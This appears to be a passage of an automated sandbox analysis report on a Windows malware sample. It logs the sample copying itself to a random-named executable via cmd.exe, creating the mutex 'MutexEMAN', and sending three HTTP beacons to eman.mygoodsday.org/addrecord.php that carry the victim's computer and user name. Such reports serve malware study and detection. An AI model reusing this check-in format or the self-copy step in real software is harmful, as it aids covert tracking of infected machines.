| Get Time | type = Ticks, time = 346312 |
|
1 | |
| Get Time | type = Ticks, time = 346328 |
|
9 | |
| Get Time | type = Ticks, time = 346390 |
|
2 | |
| Get Time | type = Ticks, time = 346500 |
|
14 | |
| Get Time | type = Ticks, time = 346515 |
|
16 | |
| Get Time | type = Ticks, time = 346562 |
|
12 | |
| Get Time | type = Ticks, time = 347156 |
|
2 | |
| Get Time | type = Ticks, time = 347171 |
|
24 | |
| Get Time | type = Ticks, time = 347187 |
|
6 | |
| Get Time | type = Ticks, time = 347203 |
|
14 | |
| Get Time | type = Ticks, time = 347218 |
|
28 | |
| Get Time | type = Ticks, time = 347234 |
|
28 | |
| Get Time | type = Ticks, time = 347265 |
|
18 | |
| Get Time | type = Ticks, time = 347281 |
|
18 | |
| Get Time | type = Ticks, time = 348796 |
|
2 | |
| Get Time | type = Ticks, time = 349062 |
|
8 | |
| Get Time | type = Ticks, time = 349078 |
|
10 | |
| Get Time | type = Ticks, time = 349093 |
|
7 | |
| Get Time | type = Ticks, time = 349140 |
|
11 | |
| Get Time | type = Ticks, time = 349156 |
|
13 | |
| Get Time | type = Ticks, time = 349171 |
|
16 | |
| Get Time | type = Ticks, time = 349187 |
|
4 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (1595)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexEMAN |
|
1 | |
| Create | - |
|
1 | |
| Open | mutex_name = MutexEMAN, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Release | - |
|
1592 |
Network Behavior
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = eman.mygoodsday.org, address_out = 104.218.120.192, service = 80 |
|
3 |
TCP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 723 bytes |
| Total Data Received | 534 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 104.218.120.192:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x280 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 104.218.120.192 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49426 |
| Data Sent | 229 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 104.218.120.192, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 229, size_out = 229 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #2
| Information | Value |
|---|---|
| Handle | 0x2a8 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 104.218.120.192 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49505 |
| Data Sent | 245 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 104.218.120.192, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 245, size_out = 245 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #3
| Information | Value |
|---|---|
| Handle | 0x288 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 104.218.120.192 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49950 |
| Data Sent | 249 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 104.218.120.192, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 249, size_out = 249 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 723 bytes |
| Total Data Received | 534 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | eman.mygoodsday.org |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | eman.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 229 |
| Data Received | 178 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = eman.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | eman.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 245 |
| Data Received | 178 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = eman.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | eman.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 249 |
| Data Received | 178 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = eman.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: cmd.exe
158
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe" "C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:01:23, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x850 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
554
0x
76C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000f50000 | 0x00f50000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x00f5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f80000 | 0x00f80000 | 0x00f93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fe0000 | 0x00fe0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000010e0000 | 0x010e0000 | 0x010e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000010f0000 | 0x010f0000 | 0x010f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x01101fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01110000 | 0x011cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000011d0000 | 0x011d0000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001220000 | 0x01220000 | 0x0122ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe.mui | 0x01230000 | 0x01250fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x012bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012c0000 | 0x012c0000 | 0x013bffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005560000 | 0x05560000 | 0x0556ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055f0000 | 0x055f0000 | 0x056effff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e8f0000 | 0x7e8f0000 | 0x7e9effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e9f0000 | 0x7e9f0000 | 0x7ea12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea16000 | 0x7ea16000 | 0x7ea16fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea19000 | 0x7ea19000 | 0x7ea1bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea1c000 | 0x7ea1c000 | 0x7ea1efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea1f000 | 0x7ea1f000 | 0x7ea1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (118)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
24 | |
| Open | - | - |
|
25 | |
| Copy | C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe | source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe |
|
1 | |
| Read | - | size = 512, size_out = 512 |
|
1 | |
| Read | - | size = 65024, size_out = 65024 |
|
19 | |
| Read | - | size = 65024, size_out = 65024 |
|
19 | |
| Read | - | size = 65024, size_out = 18432 |
|
1 | |
| Read | - | size = 18432, size_out = 18432 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 88, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\cmd.exe | type = PROCESS_PAGE_PRIORITY |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #5: nwypdmno.exe
550
2
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe |
| Command Line | "C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe" -n |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:23, Reason: Self Terminated |
| Monitor Duration | 00:03:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb68 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3AC
0x
B04
0x
93C
0x
920
0x
8E4
0x
BE0
0x
864
0x
810
0x
8DC
0x
A70
0x
1A0
0x
C04
0x
C08
0x
C0C
0x
C10
0x
C14
0x
C1C
0x
C20
0x
C24
0x
C28
0x
C2C
0x
C30
0x
C34
0x
C38
0x
C3C
0x
C40
0x
C44
0x
C48
0x
C4C
0x
C50
0x
C54
0x
C58
0x
C60
0x
C64
0x
C68
0x
C6C
0x
C74
0x
C78
0x
C7C
0x
C84
0x
C88
0x
C8C
0x
C90
0x
C9C
0x
CA0
0x
CA8
0x
CAC
0x
CB0
0x
CB4
0x
CB8
0x
CBC
0x
CC0
0x
CC4
0x
CC8
0x
CCC
0x
CD4
0x
CD8
0x
CDC
0x
CE0
0x
CE4
0x
CF0
0x
CF4
0x
CF8
0x
CFC
0x
D08
0x
D0C
0x
EE8
0x
EEC
0x
EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00310000 | 0x003cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Private Memory | rw |
|
|
|
- |
| nwypdmno.exe | 0x00400000 | 0x0053efff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ee0000 | 0x02216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0235ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002360000 | 0x02360000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023a0000 | 0x023a0000 | 0x0249ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0261ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0271ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0289ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x0299ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x029dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b20000 | 0x02b20000 | 0x02c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c20000 | 0x02c20000 | 0x02c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ee0000 | 0x02ee0000 | 0x02fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fe0000 | 0x02fe0000 | 0x0301ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x0311ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003120000 | 0x03120000 | 0x0315ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003160000 | 0x03160000 | 0x0325ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x0329ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x0339ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033a0000 | 0x033a0000 | 0x033dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033e0000 | 0x033e0000 | 0x034dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000034e0000 | 0x034e0000 | 0x0351ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003520000 | 0x03520000 | 0x0361ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003620000 | 0x03620000 | 0x0365ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003660000 | 0x03660000 | 0x0375ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003760000 | 0x03760000 | 0x0379ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037a0000 | 0x037a0000 | 0x0389ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x038dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038e0000 | 0x038e0000 | 0x039dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039e0000 | 0x039e0000 | 0x03a1ffff | Private Memory | rw |
|
|
|
- |
